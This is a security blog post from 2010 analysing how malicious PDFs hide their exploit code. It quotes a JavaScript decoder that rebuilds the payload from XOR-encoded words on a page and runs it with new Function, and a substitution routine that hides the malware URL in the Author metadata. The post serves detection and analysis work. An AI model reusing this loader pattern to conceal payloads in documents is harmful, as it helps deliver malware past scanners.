blog
February 18, 2010
PDF exploits are becoming more and more sophisticated. In particular, they often rely on creative techniques to avoid detection and slow analysis. For a couple of examples, see Julia Wolf's and Daniel Wesemann's nice analysis of malicious documents that use the getAnnots and info tricks, where the actual malicious content is stored as annotations or as part of the document metadata (e.g., the author name).
Here is another trick that showed up recently. I'll call it the getPageNthWord trick, from the key API function it uses.
The PDF contains a JavaScript section with the following code (simplified a little):
var s = '';
new Function(decode(2, 35))();
function decode(page, xor){
var l = this.getPageNumWords(2);
for(var i = 0; i < l; i++){
word = this.getPageNthWord(page, i);
var c = word.substr(word.length- 2, 2);
var p = unescape("%"+ c).charCodeAt(0);
s += String.fromCharCode(p ^ xor);
}
return s;
}
This code creates an anonymous function, sets its body to the return
value of the decode function, and then executes it.
The interesting part is in the decode function. This function gets the
number of words contained in the third page of the document via the
getPageNumWords function (recall that pages are 0-based in the PDF
API). It then loops through all the words in that page (via the
getPageNthWord function) and manipulates them. Let's see how the third
page looks like:
11 0 obj
<<
/Length 23892
>>
stream
2 J
0.57 w
BT /F2 1.00 Tf ET
0.196 G
BT 31.19 806.15 Td ( kh29 kh2a kh55
...
kh4e kh46 kh0a kh03 kh58 kh2e kh29) Tj ET
...
endstream
endobj
The page is stored as a stream. Its contents comprise a number of
directives and the actual textual content. For example, BT indicates
the beginning of the text and, conversely, ET marks the end of the
text; 31.19 806.15 Td specifies the position of the text on the page;
and Tj is the display text operator. The actual textual content is
the string starting with kh29.
We can now go back to our decode routine. It is clear that it extracts the last
2 characters from each word (e.g., “29” from “kh29”),
interprets them as hex numbers (e.g, 0x29), xors them with 35 (e.g., 0x29 ^ 35
= 10), and finally obtains the corresponding character (e.g., “\n”).
The result of this deobfuscation is the actual exploit code, which targets 4 different vulnerabilities. However, the exploit code has one last trick, which it uses to hide the URL from where the malware is to be downloaded:
var src_table = "abcd...&=%";
var dest_table= "eAFS...=iZR-";
function get_url(){
var str = this.info.author;
var ret = encode_str(str, dest_table, src_table);
return ret;
};
Notice the info.author property. The get_url function essentially
performs a simple substitution decryption of the author metadata. Let's
see what is contained there:
17 0 obj
<<
/Author
(-Jj.gw-Jjrj.-JWMyD-JjTWM-JjngM-JgkjW
...
-JjrWk-Jjrgw-JgTyM-Jy0g.-JWgyg-Jgngw-JgYgY-JyygM-Jy.yC)
>>
endobj
Ugly, indeed. After decoding, one finally gets the malware URL.
Wepawet now handles this type of malicious PDF files. See this report for an example.
To leave a comment, complete the form below. Mandatory fields are marked *.
this is pretty badass